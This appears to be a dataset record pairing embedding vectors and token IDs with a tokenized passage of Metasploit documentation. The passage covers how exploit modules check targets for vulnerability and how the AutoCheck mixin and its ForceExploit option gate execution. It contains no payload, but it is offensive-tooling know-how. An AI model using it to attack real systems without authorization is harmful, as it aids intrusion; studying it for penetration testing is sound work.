0.11416693776845932, -0.9923613667488098, 0.6054502725601196, 0.531098484992981, -0.5810714364051819, 0.17253513634204865, -0.16166457533836365, 0.593168318271637, -0.053763147443532944, -0.6815652847290039, -0.21846385300159454, 0.38369378447532654, 0.21303914487361908, 0.4010356366634369, 0.23519928753376007, 0.2984651029109955, 0.5399898290634155, -0.27787381410598755, -0.4828575849533081, -0.10435023903846741, -0.4562600255012512, -0.3510921895503998, 0.74374920129776, 0.050701674073934555, 0.003351332154124975, 0.9768736958503723, -0.1305796504020691, 0.11782955378293991, -0.7398826479911804, 0.7764332294464111, 0.8500418663024902, 0.22615361213684082, 0.014913891442120075, 0.15961822867393494, 0.2182691991329193, 0.32367685437202454, 0.1715964823961258, 0.03666025772690773, -0.7955065965652466, 0.32063108682632446, 0.06716609001159668, -0.3909325897693634, 0.3256130516529083, -0.5905969738960266, -0.643779993057251, 0.6837237477302551, 0.20120835304260254, 0.2560075521469116, 0.206739142537117, 0.41315436363220215, -0.5009229779243469, 0.4123938977718353, -0.9755440950393677, -0.2921600341796875, 0.3505335748195648, -0.6152207851409912, 0.1370965540409088, -0.6073240041732788, -0.00731098186224699, 0.27789199352264404, -0.08282332122325897, -0.5376559495925903, 0.945408821105957, -0.47749629616737366, 0.1331997811794281, 0.5755147933959961, -0.45746684074401855, -0.10989882797002792, -0.5855445265769958, 0.2465086579322815, -0.48507821559906006, -0.9828264713287354, 0.18592603504657745, 1.0218007564544678, 0.5495012402534485, 0.14110490679740906, 0.05428777262568474, 0.034138068556785583, -0.011725851334631443, -0.5401324033737183, -0.26433709263801575, 0.39806750416755676, -0.4785994589328766, 0.5061295032501221, -0.4510844647884369, 0.023012585937976837, 0.532909095287323, 0.08414796739816666, 0.2958659827709198, -0.10354983806610107, -0.5354235768318176, 0.4297596514225006, -0.27549493312835693, -0.1358572542667389, 0.5419706106185913, 0.4770805537700653, 0.17539475858211517, -0.596586287021637, 0.1139591708779335, 0.0315217487514019, 0.07283850759267807, 1.007214903831482, 0.10898919403553009, -0.16307665407657623, 0.21461935341358185, 0.3688427805900574, -0.6211031675338745, -0.22254854440689087, 0.6434534788131714, 0.026274051517248154, -0.40009602904319763, 0.45691365003585815, 0.05184132233262062, 0.04879751056432724, 0.26129260659217834, -0.4040999710559845, 0.18617777526378632, -0.18624347448349, 0.5076383352279663, -0.0012422454310581088, -0.3293125331401825, 1.1723623275756836, -0.31534916162490845, 0.5924199223518372, -0.14365553855895996, -0.15883570909500122, 0.47324925661087036, -0.10739646852016449, -1.0699564218521118, 0.3244069814682007, 1.0512069463729858, 1.12394380569458, -0.4802066683769226, 0.7401707172393799, -0.2331230342388153, -0.1152179092168808, 0.32165834307670593, 0.18253667652606964, -0.4789595305919647, -0.02298170141875744, 0.21965214610099792, -0.34871745109558105, -0.6684499382972717, 0.20259681344032288, 0.5116509199142456, -0.06325089931488037, 0.576087236404419, 0.050700776278972626, 0.15788301825523376, -0.23382963240146637, 0.6710337996482849, -0.2926417887210846, 0.680616021156311, 0.4816184341907501, -0.3020324110984802, -0.6198513507843018, 0.8884631991386414, 0.38083985447883606, 0.4563978314399719, 0.1922522932291031, 0.6951538920402527, -0.394016295671463, 0.3768720030784607, 0.34137290716171265, -0.5725533962249756, -0.44181835651397705, -0.06739145517349243, -0.6031469106674194, -0.06789670884609222, -0.07458049803972244, -0.3184005916118622, 0.5750971436500549, -0.20818570256233215, -0.737544596195221, -0.28685757517814636, -0.036982085555791855, -0.20436681807041168, -0.6962378621101379, 0.7959964275360107, 0.31268948316574097, -0.7369065284729004, 0.2504817843437195, 0.2966028153896332, 0.2822161614894867, 0.39720016717910767, -0.6635928153991699, -0.921617329120636, -0.11837194859981537, -0.2469710260629654, -0.23718313872814178, 1.0466870069503784, -0.722508430480957, -0.26322436332702637, 0.29645827412605286, -0.4346875250339508, -0.9044749736785889, -0.02575690858066082, -0.673237681388855, -0.1525059938430786, 0.7550032734870911, 0.37553340196609497, 0.3692361116409302, 0.8113644123077393, -0.7655335664749146, 0.3362567722797394, 0.13987764716148376, 1.2572156190872192, 0.05241232365369797, 0.9553678631782532, 0.17647884786128998, 0.16015273332595825, 0.30180761218070984, -0.5034761428833008, 0.5020257830619812, -0.06903211027383804, -0.40119469165802, -0.015030311420559883, -0.027539271861314774, -1.0975542068481445, -0.22774943709373474, -0.0023308659438043833, -0.2481800764799118, -0.22514420747756958, -0.4017091691493988, -0.8526095747947693, -0.0504981130361557, -0.5614745020866394, 0.04186352342367172, -0.07365375757217407, 0.007311453577131033, 0.20732736587524414, -0.01552675198763609, 0.5328976511955261, -0.9137973785400391, 4.197706699371338, 0.04717162996530533, 0.26371878385543823, 0.4996553957462311, 0.5130494236946106, 0.5764004588127136, 0.6145586371421814, -0.49581781029701233, 0.14929017424583435, -0.3790634274482727, 0.19057419896125793, -0.1388605386018753, 0.8486791849136353, 0.49901828169822693, 0.5618711709976196, 0.2004813700914383, -0.8932659029960632, 0.6752094030380249, 0.15306594967842102, -0.5517286062240601, -1.0218771696090698, 0.48327797651290894, -0.40511423349380493, 0.8453841805458069, 0.5489336252212524, 0.8790375590324402, -0.1018681451678276, -1.0170339345932007, 0.31934264302253723, -0.7896143198013306, 0.31470781564712524, -0.4559890031814575, 0.11539465934038162, 0.12861886620521545, -0.10573609918355942, 0.6263532638549805, 0.05386180058121681, -0.09101328253746033, -0.6414642930030823, -0.17205262184143066, 0.5026472806930542, -0.4938461482524872, -0.04528096690773964, -0.5110747814178467, 0.3451334834098816, 0.9308872818946838, -0.5464887619018555, -0.08978858590126038, 0.6704229712486267, -0.33015531301498413, 0.5381607413291931, 0.13724365830421448, 0.7320638298988342, -0.035569578409194946, -0.10767124593257904, 0.3254949450492859, 0.5637654066085815, -0.21887004375457764, 0.415082186460495, 0.20158697664737701, 0.15656587481498718, -0.5200157761573792, -0.4825759828090668, 0.2705496847629547, -0.4326079487800598, 0.683566153049469, -0.45210281014442444, 0.06568337976932526, -0.0222616046667099, -0.24502554535865784, -0.3200068175792694, -0.14019912481307983, -0.44908109307289124, -0.935377299785614, 0.15863992273807526, -0.16775542497634888, 0.02964824065566063, 0.34609395265579224, 0.6993065476417542, -0.8092032074928284, 0.09284987300634384, -0.597472608089447, -0.7399829030036926, 1.2484139204025269, 0.3320990204811096, 0.16851000487804413, -0.32427918910980225, -0.5374549031257629, -0.08316826075315475, 0.07598657160997391, 0.2919716238975525, 0.12106383591890335, -0.14915457367897034, 0.3930314779281616, -0.07924329489469528 ]
[ 11800, 2334, 18077, 14148, 2024, 2589, 2011, 9361, 1996, 2544, 1997, 1996, 8211, 5371, 1010, 2029, 2003, 2641, 13135, 1010, 3568, 2027, 2323, 2022, 5210, 4726, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 3544, 1012, 13135, 2334, 18077, 14148, 2123, 1521, 1056, 9352, 2812, 2027, 2024, 2625, 10539, 1010, 1999, 2755, 1010, 2027, 2024, 2025, 2919, 1012, 2021, 2000, 7515, 2005, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 8211, 1010, 2115, 4638, 2323, 2079, 1996, 4469, 3542, 1010, 2029, 2965, 2593, 2017, 5064, 2191, 1996, 2565, 2709, 1037, 8211, 3433, 1010, 2030, 2017, 22459, 1996, 8211, 3642, 1012, 2019, 2742, 1997, 2437, 1996, 2565, 2709, 1037, 8211, 3433, 2003, 10986, 6806, 3600, 1006, 1996, 2206, 2003, 3563, 2005, 1058, 2213, 8059, 1007, 1024, 13366, 4638, 4638, 1035, 2358, 2099, 1027, 10151, 1024, 1024, 3793, 1012, 14566, 1035, 3793, 1035, 6541, 19172, 22420, 1006, 1019, 1007, 1001, 5676, 2027, 2024, 8211, 2000, 24234, 4372, 2615, 8023, 11829, 2065, 4642, 2094, 1035, 4654, 8586, 1006, 1000, 4372, 2615, 1060, 1027, 1005, 1006, 1007, 1063, 1024, 1025, 1065, 1025, 9052, 1001, 1063, 4638, 1035, 2358, 2099, 1065, 1005, 24234, 1011, 1039, 9052, 1000, 1007, 1012, 2421, 1029, 1006, 4638, 1035, 2358, 2099, 1007, 1004, 1004, 4642, 2094, 1035, 4654, 8586, 1006, 1000, 5371, 1005, 1001, 1063, 2951, 23809, 2063, 1031, 1005, 1058, 2213, 8059, 1035, 4130, 1005, 1033, 1065, 1005, 1000, 1007, 999, 1066, 1013, 3685, 2330, 1013, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 8211, 2842, 18077, 1024, 1024, 4638, 16044, 1024, 1024, 3647, 2203, 2203, 2028, 2126, 2000, 22459, 1996, 8211, 3642, 2003, 2000, 2272, 2039, 2007, 1037, 8085, 1010, 1998, 2156, 2065, 2009, 6526, 1999, 1996, 8211, 2832, 1012, 2182, 1521, 1055, 2019, 2742, 2007, 18106, 1035, 5472, 8758, 1035, 18106, 26895, 7875, 6508, 12273, 1012, 21144, 1024, 1001, 1005, 18106, 26895, 7875, 6508, 12273, 18886, 13327, 5332, 16989, 11244, 1005, 1027, 1028, 1000, 1032, 1060, 26976, 1032, 1060, 2575, 2620, 1032, 1060, 9818, 1032, 1060, 8889, 1032, 1060, 8889, 1032, 1060, 8889, 1032, 1060, 2063, 2620, 1032, 1060, 2546, 2629, 1032, 1060, 2546, 2094, 1032, 1060, 4246, 1032, 1060, 4246, 1000, 1001, 1005, 18106, 26895, 7875, 6508, 12273, 18886, 13327, 1005, 1027, 1028, 1014, 2595, 15136, 7011, 2692, 13366, 4638, 1035, 9495, 8085, 1027, 5219, 1012, 4334, 12734, 1012, 2033, 2213, 16416, 2094, 1006, 1030, 11596, 1031, 1005, 9353, 29165, 2094, 16703, 1012, 4654, 2063, 1005, 1033, 1009, 4539, 1031, 1005, 18106, 26895, 7875, 6508, 12273, 18886, 13327, 1005, 1033, 1010, 4539, 1031, 1005, 18106, 26895, 7875, 6508, 12273, 18886, 13327, 5332, 16989, 11244, 1005, 1033, 1012, 3091, 1007, 2065, 8085, 1027, 1027, 4539, 1031, 1005, 18106, 26895, 7875, 6508, 12273, 18886, 13327, 5332, 16989, 11244, 1005, 1033, 2709, 2995, 2203, 2709, 6270, 2203, 13366, 4638, 1030, 11596, 1027, 1063, 1065, 9353, 29165, 2094, 16703, 1027, 5219, 1012, 4334, 12734, 1012, 16293, 16703, 1012, 2131, 5302, 8566, 2571, 11774, 19738, 1006, 1000, 9353, 29165, 2094, 16703, 1012, 4654, 2063, 1000, 1007, 1030, 11596, 1031, 1005, 9353, 29165, 2094, 16703, 1012, 4654, 2063, 1005, 1033, 1027, 9353, 29165, 2094, 16703, 1031, 1000 ]
metasploit
108.txt
2
return " ] if @ addresses ['acrord32. exe'] = = 0 return msf : : exploit : : checkcode : : unknown elsif check _ trigger return msf : : exploit : : checkcode : : vulnerable else return msf : : exploit : : checkcode : : detected end end another possible way to inspect is grab the vulnerable file, and use metasm. but of course, this is a lot slower and generates more network traffic. autocheck mixinmetasploit offers the possibility to automatically call the check method before the exploit or run method is run. just prepend the autocheck module for this, nothing more : prepend msf : : exploit : : remote : : autocheck according to the checkcode returned by the check method, framework will decided if the module should be executed or not : checkcodemodule executed? exploit : : checkcode : : vulnerableyesexploit : : checkcode : : appearsyesexploit : : checkcode : : detectedyesexploit : : checkcode : : safenoexploit : : checkcode : : unsupportednoexploit : : checkcode : : unknownnothis mixin brings two new options that let the operator control its behavior : autocheck : sets whether or not the check method will be run. default is true. forceexploit : override the check result. the check method is run but the module will be executed regardless of the result. default is false. [SEP]
[ -0.19537368416786194, -0.28460705280303955, -0.22049427032470703, 0.159083753824234, -0.43947935104370117, -0.14477680623531342, -0.26552814245224, 0.08193014562129974, -0.11277474462985992, 1.1881799697875977, 0.17127728462219238, -0.09992115944623947, 0.4675660729408264, -0.40797513723373413, -0.677337646484375, 0.05477816238999367, 0.4738551378250122, -0.15876293182373047, -0.7024023532867432, 0.17471612989902496, 0.8062086701393127, -0.45037925243377686, -1.0505542755126953, -0.1599225401878357, -1.029455304145813, -0.2841024696826935, 0.3236064612865448, -1.1400507688522339, 0.8848245739936829, 1.0712281465530396, -0.26114246249198914, 0.043032675981521606, -0.019097203388810158, -0.1945357620716095, -0.1910005360841751, -0.726350724697113, 0.6598407030105591, -0.4976136386394501, -0.519580066204071, -0.9307950735092163, -0.3323121964931488, 0.5334617495536804, 0.582394003868103, -0.7600253224372864, -1.1504319906234741, -0.38494789600372314, -0.7057043313980103, 0.05743294209241867, 0.23367413878440857, -0.17714321613311768, -0.19351571798324585, 0.9133093953132629, 0.15133020281791687, -0.4339559078216553, -0.018608544021844864, -0.058959268033504486, 0.2648947536945343, -0.03982779383659363, -0.2686633765697479, 0.1971445232629776, 0.008443616330623627, 0.6298476457595825, -0.19237343966960907, -0.2984004020690918, 0.475528746843338, 0.7251559495925903, -0.4060496687889099, -0.41850557923316956, -0.2487708181142807, -0.2400399148464203, 0.36506468057632446, 0.6906917095184326, -0.4486028552055359, -0.6394845843315125, -0.4831535816192627, 0.26272618770599365, 0.7254181504249573, 0.6138839721679688, 0.09347262978553772, 1.2533459663391113, -0.816710889339447, 1.1638432741165161, 0.8192405700683594, -0.12120266258716583, 0.19756591320037842, -0.6649631261825562, 0.16620832681655884, 0.1083662286400795, -0.9042465686798096, -0.2495742291212082, 0.04446401074528694, 0.6397312879562378, -0.2994595766067505, -0.14384807646274567, -0.02941962145268917, 0.636271059513092, -0.39597606658935547, 0.16971315443515778, 0.6251214146614075, 0.014041490852832794, 0.9293144345283508, 0.26137715578079224, -0.11577478796243668, 0.2957581579685211, -0.08675703406333923, 0.4287647008895874, 0.3919678330421448, -0.26388633251190186, -0.8007811903953552, -0.13307197391986847, -0.4943333864212036, -0.07325215637683868, -0.3518288731575012, -0.21505285799503326, -0.506148099899292, -0.23359492421150208, 0.23031672835350037, 0.16465318202972412, -0.2915637195110321, -0.3757249116897583, 0.5378516912460327, -0.39533132314682007, 0.11382607370615005, -0.7186145782470703, -0.07117092609405518, -0.02732192724943161, 0.03812120482325554, 0.6613449454307556, -0.6145222783088684, -0.2700951099395752, -0.6427462697029114, -0.12905293703079224, 0.5673245787620544, 0.6631752252578735, -0.40596047043800354, 0.2111048698425293, 0.21704421937465668, -0.038128726184368134, 0.47412940859794617, -0.9773180484771729, 0.6528983116149902, 0.2861572802066803, 0.28799447417259216, 0.8927440643310547, 0.15964606404304504, -0.06081363186240196, 0.17229868471622467, -0.0037076822482049465, -0.31514090299606323, -0.009340749122202396, -0.8574035167694092, -0.5366272926330566, 0.08363015949726105, -0.13185784220695496, 0.1645050197839737, 0.08065206557512283, -0.8529285192489624, -0.07176283001899719, 0.06948018819093704, 0.5424025058746338, -0.13295170664787292, 0.6295193433761597, -0.6108478903770447, 0.8538455963134766, -0.7318519949913025, 0.25106263160705566, -0.19179968535900116, -0.5955932140350342, 0.2451048493385315, -0.16243891417980194, 0.5940937995910645, -0.4006025791168213, -0.571710467338562, 0.5555505752563477, 1.573870062828064, 0.021524224430322647, 0.2632969617843628, -0.49285563826560974, 0.14432820677757263, 0.5912509560585022, -0.4734848439693451, 0.3713338077068329, 0.024573711678385735, 0.602403998374939, 0.29173675179481506, 0.3910484313964844, 0.21761471033096313, -0.36620816588401794, -0.5725119113922119, -0.32667094469070435, 0.43407872319221497, 0.4498002827167511, -0.5194858908653259, 0.2969495952129364, -0.011031962931156158, -0.4460310637950897, -0.712044894695282, 0.2893441915512085, 0.4420194625854492, -0.8654462695121765, -0.39636948704719543, 0.422682523727417, -0.4428049325942993, 0.42842209339141846, -0.2758868634700775, -0.22461798787117004, 0.807796061038971, 0.5653471350669861, -0.4955379366874695, 0.32021963596343994, 0.6815764904022217, -0.2663865089416504, -1.035784125328064, 0.13500866293907166, 0.13895955681800842, -0.05903717875480652, -0.03488663583993912, 0.2642395496368408, 0.1688663214445114, 0.34117066860198975, 0.13013897836208344, 0.718338131904602, 0.25388994812965393, -0.12845227122306824, -0.239645853638649, -0.5966681838035583, -0.23656068742275238, 0.675703763961792, 0.2419290691614151, 0.5165085196495056, 0.029509393498301506, 0.5005618333816528, -0.25546467304229736, 1.0507296323776245, -0.3657452464103699, -0.2945195734500885, 0.2120496928691864, 0.2162412852048874, -0.5743454098701477, 0.3225540816783905, 0.09922856837511063, 1.034996509552002, -0.07253645360469818, 0.8912463188171387, -0.011431639082729816, 0.053413186222314835, 0.6080976128578186, -0.6412245035171509, 0.09495998173952103, 0.6889328360557556, -0.5820118188858032, 1.1710103750228882, 0.1542035937309265, 0.14088240265846252, -0.087730772793293, -0.8150143623352051, -0.06912865489721298, 0.3674297630786896, -0.942851185798645, 0.3172370493412018, 0.5234596729278564, -0.43563881516456604, -0.44831088185310364, -0.7749594449996948, -0.055560458451509476, 0.8695176243782043, 0.3132031559944153, -0.003834787756204605, -0.6727972626686096, -0.45262688398361206, -0.1322859674692154, -0.012219415046274662, -0.9876188039779663, -0.06820317357778549, -1.1124944686889648, 0.5614732503890991, -0.048715416342020035, -0.557157576084137, 0.038383860141038895, -0.5825801491737366, 0.4139510989189148, 0.4174548387527466, -0.3294198513031006, 0.9334206581115723, 0.5831805467605591, 0.0900939330458641, -0.684999942779541, -0.2674485146999359, -0.06976202130317688, 1.0541874170303345, -0.5155277252197266, -0.672909677028656, -0.245197132229805, -0.34726592898368835, 0.4185665249824524, -0.08524816483259201, 0.51962810754776, -0.15458336472511292, 0.002747827209532261, 0.47753268480300903, -0.30019471049308777, -0.4208933115005493, -0.19456619024276733, -0.21791568398475647, -0.31064072251319885, -0.0799887478351593, 0.35176876187324524, -0.36643749475479126, 1.0711556673049927, 0.6609012484550476, -1.0677604675292969, 0.7248657941818237, -0.7358713150024414, 0.2311781942844391, -0.8838602304458618, 0.4608497619628906, 0.2364453375339508, -0.25805777311325073, -0.19358688592910767, -0.548233151435852, -0.6312275528907776, -0.07693904638290405, -0.6473207473754883, -0.3320361077785492, -0.7278732061386108, 0.54038405418396, 0.08662352710962296, -1.1389341354370117, 0.3477247953414917, -0.5613673329353333, 0.04664655774831772, -0.15699031949043274, 0.05702778697013855, 0.9294629096984863, 0.3604932129383087, 0.5285624861717224, -0.6514428853988647, 0.3167343735694885, 0.15520264208316803, 0.09677671641111374, -0.23221299052238464, -0.2010592371225357, 0.6502025127410889, -0.07591932266950607, 0.21784286201000214, 0.2769651412963867, 0.13169272243976593, -0.4990847706794739, -0.32009536027908325, -0.9281724095344543, 0.004138490185141563, 0.7672330737113953, 0.12453275918960571, 0.5244408845901489, -0.40676653385162354, 1.091552495956421, -0.6426361203193665, 0.4885266125202179, 0.7243176102638245, 0.4061928689479828, 0.5734590888023376, 0.1893415004014969, -0.20092545449733734, 0.2928678095340729, -0.09101483970880508, -0.8952553272247314, -0.265291690826416, 0.8146054744720459, 0.6430865526199341, -0.13671231269836426, -0.18204514682292938, -0.39893150329589844, 0.18057042360305786, 0.08165965229272842, -0.07697119563817978, -0.33291369676589966, 0.3376142680644989, 0.2703149616718292, 1.1531319618225098, -0.4777691662311554, -0.2564319372177124, -0.2693813145160675, 0.8505569696426392, 0.5110419988632202, -0.2604561448097229, -0.43374255299568176, -0.5879484415054321, -0.1761811226606369, -0.9579886794090271, -0.08652999997138977, -0.49839866161346436, 0.11980384588241577, 0.7366051077842712, -0.5589449405670166, -0.8340765833854675, -1.1444329023361206, 1.0395357608795166, 0.5879362225532532, 0.7122535705566406, 0.47913220524787903, -0.012416082434356213, -0.3394884765148163, 0.6621592044830322, 0.5610324144363403, -0.43695196509361267, 0.5694095492362976, -0.7958847880363464, 0.677939236164093, -0.6161057949066162, -0.049009427428245544, -0.2783220410346985, 0.3709333837032318, 0.4117579758167267, 0.4979870617389679, -0.335978627204895, -0.4229752719402313, -0.5358567237854004, 0.8738712072372437, 0.2567076086997986, -0.06904138624668121, -0.861863911151886, -0.4426586627960205, -0.3703985810279846, -0.7063148021697998, 1.1719824075698853, -0.7619480490684509, 0.33184659481048584, -0.1787685602903366, 0.20410193502902985, 1.1314189434051514, -0.5139314532279968, -0.4247231185436249, -0.6438494920730591, -0.6353561282157898, -1.0899673700332642, 0.30167096853256226, 0.835463285446167, -0.6145859956741333, 0.014636480249464512, -0.15181653201580048, -0.23733030259609222, -0.24841377139091492, -0.7943008542060852, -0.47719135880470276, 0.07036883383989334, -0.2986764907836914, 0.3896208703517914, -0.07701720297336578, -0.10547500103712082, -0.19535979628562927, 0.7125502228736877, -0.8472101092338562, 0.6958013772964478, -1.0290669202804565, 0.19847004115581512, 0.26212993264198303, 0.5501089692115784, -0.22232761979103088, 0.31674832105636597, -0.49795204401016235, -0.20279403030872345, -0.5578582882881165, 0.24816708266735077, -1.1559537649154663, -0.6259357333183289, -0.004558532498776913, -0.08678001910448074, -0.05023626983165741, 1.2033487558364868, -0.2171926498413086, -0.3489890396595001, 0.5856597423553467, 0.30889439582824707, -0.5358628630638123, 0.2936340868473053, -0.45460471510887146, 0.5433191061019897, 0.6481658220291138, -0.03964616730809212, 0.12399205565452576, -1.3161216974258423, 1.1433016061782837, 0.18212108314037323, -0.3969721794128418, -0.7165032029151917, -0.6309796571731567, -0.3406867980957031, -0.06316855549812317, 0.31795868277549744, 1.1133824586868286, -0.03729470074176788, -0.5325343608856201, 0.05428876355290413, -0.21868011355400085, -0.9143857359886169, -0.25011804699897766, 0.019321652129292488, -0.30221986770629883, 0.23154963552951813, 0.3423895239830017, 0.13325054943561554, -0.2816608250141144, -1.0044742822647095, 0.008857719600200653, 0.15282009541988373, 0.2645825743675232, -0.16101261973381042, 0.12918569147586823, -0.2578984200954437, 0.09382733702659607, -0.5915092825889587, 0.6079047322273254, -0.16545216739177704, 0.3116931915283203, 0.39002561569213867, -0.44875824451446533, 0.3848341107368469, -0.09336403012275696, -0.35953056812286377, 0.6681575775146484, 0.29549452662467957, -1.5051231384277344, 0.27601903676986694, 0.5629035830497742, -0.697080135345459, 0.6481426954269409, 0.24641209840774536, -0.7745651006698608, -0.67735755443573, -0.5075306296348572, 0.2685924768447876, -0.09683316946029663, -0.37791907787323, -0.3984498679637909, -0.8834113478660583, -0.43724969029426575, 0.9545807242393494, 0.5432606339454651, -0.79449063539505, -0.10609828680753708, -0.4309339225292206, -0.00482251076027751, -0.7532556056976318, -0.23526403307914734, -0.2736264765262604, -0.9782083630561829, 0.0077209766022861, 0.6102620959281921, -0.09174271672964096, 0.26325714588165283, -0.6155213713645935, 0.7176445126533508, 0.28439366817474365, -0.1661308854818344, -0.46334144473075867, -0.5335471034049988, -0.1177406758069992, 0.3081102967262268, -0.8796092867851257, 0.5689756870269775, -1.0072847604751587, -0.05276652052998543, 0.20443160831928253, 0.9206710457801819, -0.350181519985199, 0.46264147758483887, 0.15472935140132904, 0.7023186087608337, 0.6044578552246094, -0.7235580682754517, 0.7727790474891663, 0.10109593719244003, 1.2636241912841797, -0.042701758444309235, 0.6686220765113831, -0.35169583559036255, 0.3018910586833954, -0.8284291625022888, -0.8716885447502136, 0.7109259366989136, -0.22778956592082977, 0.21163465082645416, 0.20249970257282257, -0.10130127519369125, 0.6885880827903748, -0.6518369317054749, 0.07896090298891068, 0.8618512749671936, 0.3314967453479767, -0.7203311324119568, -0.32583439350128174, 0.38589924573898315, 0.7598875164985657, -0.31960567831993103, -0.1629192978143692, 0.24398495256900787, 0.276879221200943, 0.19403064250946045, 0.044838450849056244, -0.4505522847175598, -0.5420475602149963, -0.16735056042671204, 0.47462719678878784, 0.1976945847272873, 0.6290051937103271, -0.6194565892219543, -0.949905276298523, -0.647321343421936, 0.17679499089717865, 0.1498001515865326, 0.7683278918266296, 0.3801794946193695, 0.8932058811187744, 0.08703169971704483, -0.145231693983078, -0.4104287028312683, -0.344419926404953, -0.47090476751327515, 0.636652946472168, 0.028755851089954376, -0.7767239212989807, 0.5994030833244324, 0.19948962330818176, -0.8233687877655029, -0.9931540489196777, -0.41486212611198425, 0.14863967895507812, -0.06316926330327988, -0.25524792075157166, -0.4986098110675812, -0.051938723772764206, 0.041156016290187836, 0.4885745048522949, 0.4768017530441284, 0.11325006186962128, 0.25854194164276123, -0.49083656072616577, 0.18921200931072235, -0.4706779420375824, -0.2567639946937561, 0.9223749041557312, -0.32358747720718384, -0.0006986648077145219, -1.0575189590454102, -0.34785667061805725, -0.15048028528690338, -0.013010937720537186, 0.5172430872917175, 0.8331089615821838, 0.6365297436714172, 0.808196485042572, 0.0976051539182663, 1.2055450677871704, -0.4414888620376587, 0.9250059127807617, 0.21650271117687225, -0.6027994751930237, -0.658748209476471, -0.43899619579315186, -0.5689275860786438, 0.011428493075072765, -0.01882879249751568, -0.3531641960144043, 0.6369723677635193, 0.3725297749042511, 0.47456032037734985, 0.13774678111076355, -0.9272438883781433, 0.20052757859230042, -0.8155586123466492, 0.0756138488650322, 0.14471891522407532, 0.19649259746074677, -0.4358891248703003, 0.026600243523716927, -0.11443525552749634, -0.4002380967140198, -0.6469148993492126, 0.3281703591346741, 0.04117703437805176, -0.8449612855911255, -0.880413293838501, 0.0370015986263752, -0.31476813554763794, -1.0320240259170532, -1.0179160833358765, 0.07215872406959534, -0.15840362012386322, -0.6916272044181824, 0.01642008125782013, -0.23058809340000153, 0.457500696182251, 0.3130597472190857, -0.8984606862068176, 0.03577369824051857, -0.3539600968360901, 0.018957264721393585, 0.3301330506801605, -0.36277368664741516, -0.37690070271492004, 0.8437056541442871, 0.885631263256073, 0.05060570314526558, 0.44801056385040283, -0.13976354897022247, 0.17118212580680847, 0.028845487162470818, 0.10000702738761902, 0.4481859505176544, -0.17576833069324493, -0.6654464602470398, 0.4801945090293884, -0.5691156983375549, -0.21196776628494263, 0.0955469161272049, -1.1761723756790161, -0.4580233097076416, 0.5440904498100281, 0.0533030703663826, -0.04470080882310867, 0.3053756654262543, -0.6112678050994873, -0.023261137306690216, 0.15359292924404144, 0.30930694937705994, 0.4417048990726471, 0.5317562818527222, -0.03373841196298599, -0.014880862087011337, 0.037261687219142914, 0.7554847002029419, 0.26246753334999084, 0.28540077805519104, 0.5024692416191101, 0.6670057773590088, -0.16453728079795837, -0.23255273699760437, -0.4263955354690552, -0.7442260384559631, -0.06292588263750076, 0.32855480909347534, 0.7126577496528625, 0.1720341593027115, 0.2829105854034424, 0.2069200873374939, -0.6037701368331909, 0.19162097573280334, -0.5690973401069641, -0.03134410083293915, 0.5167651176452637, -0.6409109234809875, -0.2306574285030365, -0.6936957240104675, 0.3247356712818146, -0.2568981349468231, 0.25952059030532837, -0.08417189121246338, 0.6622648239135742, 0.1824188530445099, 0.5024463534355164, 0.56370609998703, 0.23096300661563873, 0.10496752709150314, -0.15813341736793518, 0.385212779045105, -0.4624650478363037, -1.3017981052398682, 0.36055105924606323, 0.5399960875511169, 0.16788816452026367, 0.196930930018425, -0.34078356623649597, -0.07254721224308014, -0.3166549801826477, 0.2910574972629547, -0.1484682857990265, -0.06157539784908295, -0.9120126962661743, 1.0802415609359741, -0.946412980556488, 0.636688232421875, 0.3288104236125946, -0.16453026235103607, -0.1475704163312912, -0.5080896019935608, -0.21781744062900543, 0.025274252519011497, 0.19925843179225922, -0.04023488610982895, 0.9730504155158997, 0.7523812055587769, 0.5185148119926453, -0.4798624515533447, -0.28619760274887085, 0.04899608716368675, 0.9010818600654602, 0.6968767046928406, 0.7050032019615173, -0.2092866450548172, 0.6342976689338684, 0.3859773576259613, -0.4791989326477051, -0.26720675826072693, 0.09836606681346893, -0.2845870554447174, -0.09572780877351761, 0.1800713986158371, 0.37840014696121216, 0.49172940850257874, -0.4746549725532532, -0.4943448603153229, 0.3308202624320984, -0.15803790092468262, 0.40052229166030884, -0.447672575712204, -0.4808761775493622, 0.17365778982639313, -0.7562801837921143, 0.393450528383255, -0.046309713274240494, -0.36704492568969727, 1.2931240797042847, 0.034710075706243515, -0.7704983949661255, -0.20796555280685425, 1.2167657613754272, 0.7984866499900818, -0.7080387473106384, 0.12870895862579346, 0.3953089416027069, 0.08369395136833191, -0.46297135949134827, 0.3170725703239441, 0.09394856542348862, 0.4274226725101471, -0.05831131711602211, -0.09965895861387253, -0.5410040616989136, -0.013494363985955715, -0.14652737975120544, 0.4452957808971405, 0.11966255307197571, -0.43004894256591797, 0.48544538021087646, -0.528733491897583, 0.7674728631973267, -0.5442138314247131, 0.32859402894973755, 0.9409037828445435, -0.036872271448373795, 0.05147235095500946, 0.4123162031173706, 0.05963459610939026, -0.32773083448410034, 0.08461474627256393, 1.239514946937561, 0.2010025978088379, 0.6506882905960083, 0.13801415264606476, -0.28522512316703796, -0.2304694950580597, 0.2899230718612671, -0.9225620627403259, -0.44294604659080505, 0.06607813388109207, -0.05624739080667496, 0.4798494577407837, -0.002229605335742235, -0.8539018034934998, 0.24254386126995087, 0.3184967637062073, -0.2802901864051819, -0.46169957518577576, 0.5444601774215698, 0.10267536342144012, -1.1056807041168213, 0.27661818265914917, 0.9517233371734619, -0.09830555319786072, 0.4353363811969757, -0.6632529497146606, -0.3174125850200653, -0.645451545715332, -0.27922961115837097, -1.1378251314163208, 0.008650392293930054, -0.6468730568885803, -0.08934857696294785, 0.25232288241386414, -0.25186482071876526, 0.2409404069185257, -0.12485039234161377, -0.3198009729385376, -0.4529648423194885, 0.35740140080451965, 0.6688001751899719, -0.07559528201818466, 0.5791971683502197, -0.3574918806552887, 0.520054280757904, 0.4238993525505066, 0.8662008047103882, 0.020261390134692192, 0.932328462600708, 0.7181231379508972, -0.7054789662361145, 0.24366948008537292, 0.669801652431488, -0.07028670608997345, -0.09508463740348816, -0.33584854006767273, 0.12512952089309692, 0.40790966153144836, -1.13176691532135, -0.3922426700592041, 0.1447151154279709, 0.8029918074607849, -0.3909907937049866, -0.7481577396392822, -0.5032129883766174, -0.19717830419540405, -1.048784852027893, -0.28101658821105957, -0.5676712393760681, -0.07446804642677307, -0.16406777501106262, -0.32480108737945557, 0.18665513396263123, -0.7068735361099243, 